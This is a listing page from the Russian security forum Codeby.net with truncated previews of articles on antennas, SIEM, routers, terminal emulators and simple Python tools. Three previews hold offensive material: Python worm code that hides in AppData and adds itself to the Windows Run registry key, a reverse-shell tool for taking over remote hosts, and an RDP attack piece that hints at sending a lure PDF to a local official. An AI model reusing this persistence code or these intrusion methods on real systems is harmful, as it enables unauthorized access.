Форум информационной безопасности - Codeby.net

Статья Антенны и антенно-фидерное хозяйство -1

  • 5 840
  • 11
Доброго здравия коллеги!

На форуме много качественного и исчерпывающего материала по всем направлениям IT сферы. Но есть обойдённая вниманием тема: Антенны и антенно-фидерное хозяйство.

Можно конечно сказать: - Нафига нам влазить в эти дебри? Поставил крутую и дорогую антенну и она пробьёт до любой Wi-Fi точки. Если не знать как правильно работает эта «крутая» антенна и как правильно ей пользоваться, никуда она не добьёт, а будет греть лишь воздух вокруг себя. Ибо в Wi-Fi применяется частота от 2,4 Ггц до 2,5 Ггц, а в СВЧ-печах (микроволновках) — 2,45Ггц.
Но хочу я, всё же, начать не с антенн, а с небольшой теории распространения радиоволн.

Я не стану расписывать здесь расчёты формул электродинамики Максвелла или о работах Фарадея над открытием электромагнитных волн. А хочу напомнить лишь что такое радиоволны.

1.gif


Радиоволна — это электромагнитные волны, распространяемые в окружающем пространстве. К радиоволнам относятся электромагнитные волны с...

Статья Управление информацией по вопросам безопасности и менеджмент событий безопасности (Security Information and Event Management (SIEM))

  • 2 616
  • 0
Продукты программного обеспечения и службы SIEM объединяют ( (SIM)) и менеджмент событий безопасности ((security event management)SEM). Они предоставляют анализ предупреждений о безопасности в режиме реального времени, создаваемых сетевым оборудованием и приложениями.

Поставщики продают SIEM в качестве программного обеспечения, в качестве устройств или в качестве управляемых служб; эти продукты также используются для регистрации данных безопасности и создания отчетов в целях согласования.

Несмотря на то, что индустрия решила использовать термин ‘ ’ в качестве всеобъемлющего термина для этого...

Статья Простой червь на python

  • 16 359
  • 10
Всем доброго времени суток, участники Codeby!
Перед шарагой нечего было делать, настрочил простенький червь на питоне, что бы он
послужил вам примером/неким представлением "тёмной" области этого языка.

Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить
пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в
папку AppData.

Python:
directory = os.getenv("APPDATA") + r'/your_program/'
base_file = directory + os.path.basename(__file__)

if not os.path.exists(directory):
    os.makedirs(directory)
    shutil.copy(__file__, base_file)

Первым делом я решил закрепить наш файл в автозапуске операционной системе,
делал я это через реестр.Тут нам поможет модуль winreg.

Python:
path_to_reestr = OpenKey(HKEY_CURRENT_USER,
                        r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                        0, KEY_ALL_ACCESS)
SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)...

Лучшие эмуляторы терминала для LInux

  • 20 722
  • 16
Представляю вашему вниманию обзор моих любимых эмуляторов, которые призваны заменить вашу стандартную консоль.

Upterm

Upterm (ранее Black Screen) — не только эмулятор терминала, но и интерактивная оболочка с открытым исходным кодом и множеством потрясных функций. Это приложение является IDE (интегрированной средой разработки), основанной на и использующей технологии и . В пользовательском интерфейсе зайдейтсвованы HTML и CSS, что делает сипользование Upterm еще более удобным.

Главная фишка Upterm — функция умного автозаполнения. Окно автозаполнения появляется по мере ввода, предлагая различные варианты окончания команд в выпадающем списке.
29716319-95f9a8d8-89b3-11e7-8515-fcb236eb4454.gif


В правой части автозаполнения можно обнаружить много полезной информации, например...

Статья Hershell: Инструмент для удаленного управления системами Windows и Linux

  • 8 308
  • 13
Приветствую гостей и участников Codeby.net. В этой статье поговорим о способах проникновения и получения контроля над удаленными ПК на ОС Linux и Windows.

Наша первоочередная цель – это заполучить надежный shell на нужном хосте, а потом уже думать над повышением привилегий и так далее.
И для ее осуществления я выбрал инструмент под названием Hershell, не громоздкая утилита, удобная в использовании, написанная на Go (Golang).

1538161602785.png


Он использует TLS для защиты соединений и обеспечивает функцию фиксации отпечатка пальца, открытого ключа сертификата, предотвращая перехват трафика.

Поддерживаемые ОС:
  • Windows
  • Linux
  • Mac OS
  • FreeBSD и её производные.*
*Только если ваша FreeBSD может запускать ELF файлы.

Очевидными плюсами, разработчики Hershell называют, простоту создания обратного шелла, поддержку множества операционных систем, и в отличие от...

Пишем простой менеджер загрузок

  • 3 383
  • 2
Приветствую всех, эта рубрика моих никому не нужных разработок. И сегодня мы с вами будем писать простой менеджер загрузок или сценарий для загрузки больше кол-ва файлов. Попробую объяснить для чего это. Представьте что у вас есть ссылки на загрузку музыки(их очень много), вы же не будете переходить по каждой ссылке и скачивать? Мы автоматизируем этот процесс. В файле будут ссылки на скачку, а сценарий скачает их за нас.

!Пишу на python3!
Идея статьи в том, чтобы улучшить знания python читателя(возможно он откроет для себя что-то новое).
Вот такие либы я буду юзать для реализации того, что я хочу.
Код:
import requests
import random
import glob
import os
import shutil

Введем списки для работы:
Код:
site = []
files = []

Теперь реализуем чтение ссылок из файла:
Код:
handle = open('sites.txt') # Читаем файл
for x in handle: #Записуем содержимое файла в список
    site.append(x)
site = map(lambda s: s.strip(), site) # Удаляем из списка \n
site = list(site) #...

Статья Создаём уникальный шифр на Python

  • 871
  • 6
Сегодня речь пойдёт о шифровании. Если есть необходимость сохранить конфиденциальность информации в текстовых документах даже при их утечке в лапы кулцхакеров, то лучшим выходом будет шифровка.

SHifrovanie.jpg


В сети есть множество программ для этого дела, да вот беда – всё что шифруется, так же замечательно и дешифруется, ведь инструменты то в паблике. Конечно понадобятся какие-то усилия на поиск подходящей тулзы, но это не займёт слишком долго по времени.

Самый верный выход – это написать свой собственный encoder с уникальным кодом, не похожим на другие.
Приступим:

Сначала накидаем обычного Цезаря, но мы ведь русские, а значит нам понадобятся как латиница, так и кириллица. Буквы большие и маленькие -

Python:
# -*- coding:utf -8 -*-
# !/usr/bin/python3

# encoder
list_encoder = 'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЫЬЪЭЮЯабвгдеёжзийклмнопрстуфхцчшщыьъэюяABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
n = int(input('Введите число: '+'\n'))
s = input('Введите...

Статья Анонимная розетка в твоем доме

  • 3 525
  • 2
1.jpg


Внимание!!! данный материал посвящается тем кто еще хочет купить некоторое устройство-роутер подключившись к которому вы вливаетесь в пространство анонимного интернета !

Но только цена предложенного мной устройства от 2$ до 12$, а возможностей во много раз больше.

И я вам его продавать не собираюсь. Купите в любом компьютерном магазине или на aliexpress

В своих статьях я много описывал. как создать изолированную OS на виртуальных машинах Vmware, Virtualbox.

Некоторые Видео метериаялы по данной тематике представлены ниже !!!

Double SSH Tunnel Manager подключаем Socks5 к Virtualbox через сетевой мост


Double SSH Tunnel Manager подключаем SSH tunnel к Virtualbox через...

Статья Железная шкатулка №1: Обзор китайских роутеров GL.iNet

  • 26 372
  • 40
Однажды, рыская по cети в поисках идеального роутера, я наткнулся на китайских мастеров из компании GL.iNet, которые, следуя принципам открытости ПО и DIY, оснащают свои устройства довольно обширными возможностями для модификации и экспериментов с прошивкой OpenWrt. Далее проведу краткий обзор роутеров, которые меня заинтересовали.

GL.iNet GL-AR300M

Самая новая модель "компактной" серии (39 г, 58x58x25 мм) роутеров GL.iNet. Выпущена в начале 2017 года. Лично я склонился именно к этому решению, так как никаких специфических предпочтений, вроде наличия 4GPIO и прочего, у меня нет.

- Процессор Qualcomm Atheros QCA9531 SoC, 650 МГц
- Cкорость соединения до 300 Мбит/с
- Стандарты связи: 802.11 b/g/n
- ОЗУ: 128 Мб DDR2 от EtronTech
- Флэш-память: 16 Мб (Nor) от Winbond + 128 Мб (Nand) от GigaDevice в стандартной и расширенной версиях
- Интерфейсы: WAN, LAN, USB 2.0...

Статья Firework: Анализ Безопасности RDP и Методы Защиты

  • 5 116
  • 12
firework1.png


Добрый день , Друзья,Уважаемые Форумчане и те , кто следит за пульсом ИБ.

О чём мы будем с вами сегодня говорить : о банальной эксплуатации дедика и новом инструменте Firework. Этот инструмент нам помогает разнообразить атаки на удалённые рабочие столы Windows. У нас с вами был и так перерывчик , который разбавили моим нетрезвым присутствием и примитивным моим же творчеством. Пора и о серьёзных вещах поговорить.

Натолкнуло меня на написание этой статьи общение с девушкой-секретаршей из областной администрации моего города.
Опустим лирику и рассуждения о пустом смысле переписки с администрациями,если это конечно реально не целевая атака))

Речь шла об отправке письма ей на почту мной в виде файла pdf. Я ещё переспросил,не боятся ли они получать файлы в таком формате. На что , мне Чудо томным голоском промурчало,что они внимательно и в скоростном режиме загруженности читают все файлы.. Занавес короче , в общем , звонок-то был...